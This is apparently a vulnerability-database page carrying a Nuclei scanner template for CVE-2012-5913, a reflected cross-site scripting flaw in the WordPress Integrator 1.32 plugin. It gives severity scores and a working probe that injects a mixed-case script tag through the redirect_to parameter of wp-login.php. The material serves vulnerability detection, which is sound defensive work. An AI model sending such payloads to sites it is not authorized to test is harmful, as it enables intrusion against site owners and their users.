Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2012-5913
HistoryJul 13, 2021 - 5:15 p.m.

WordPress Integrator 1.32 - Cross-Site Scripting

2021-07-1317:15:23
ProjectDiscovery
github.com

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

5.8 Medium

AI Score

Confidence

High

0.019 Low

EPSS

Percentile

88.5%

A cross-site scripting vulnerability in wp-integrator.php in the WordPress Integrator module 1.32 for WordPress allows remote attackers to inject arbitrary web script or HTML via the redirect_to parameter to wp-login.php.

id: CVE-2012-5913

info:
  name: WordPress Integrator 1.32 - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: A cross-site scripting vulnerability in wp-integrator.php in the WordPress Integrator module 1.32 for WordPress allows remote attackers to inject arbitrary web script or HTML via the redirect_to parameter to wp-login.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.
  remediation: |
    Update the WordPress Integrator plugin to the latest version or apply the vendor-supplied patch to mitigate this vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2012-5913
    - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-integrator-redirect_to-parameter-cross-site-scripting-1-32/
    - http://packetstormsecurity.org/files/111249/WordPress-Integrator-1.32-Cross-Site-Scripting.html
    - http://www.darksecurity.de/advisories/2012/SSCHADV2012-010.txt
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/74475
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
    cvss-score: 4.3
    cve-id: CVE-2012-5913
    cwe-id: CWE-79
    epss-score: 0.01863
    epss-percentile: 0.8837
    cpe: cpe:2.3:a:wordpress_integrator_project:wordpress_integrator:1.32:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: "wordpress_integrator_project"
    product: "wordpress_integrator"
  tags: cve,cve2012,wordpress,xss,wp-plugin,packetstorm,wordpress_integrator_project
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/wp-integrator/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - 'Wordpress Integrator'

  - method: GET
    path:
      - '{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</sCripT><sCripT>alert(document.domain)</sCripT>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a0046304402203fe33a98fffb2f7bd719f8835979dce71ac15ffda6a390c507485268dba885130220611cdd56362890cd14694b9b8b068971580e88a58747d31ad37b7af05c7b070b:922c64590222798bb761d5b6d8e72950

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

5.8 Medium

AI Score

Confidence

High

0.019 Low

EPSS

Percentile

88.5%

Related for NUCLEI:CVE-2012-5913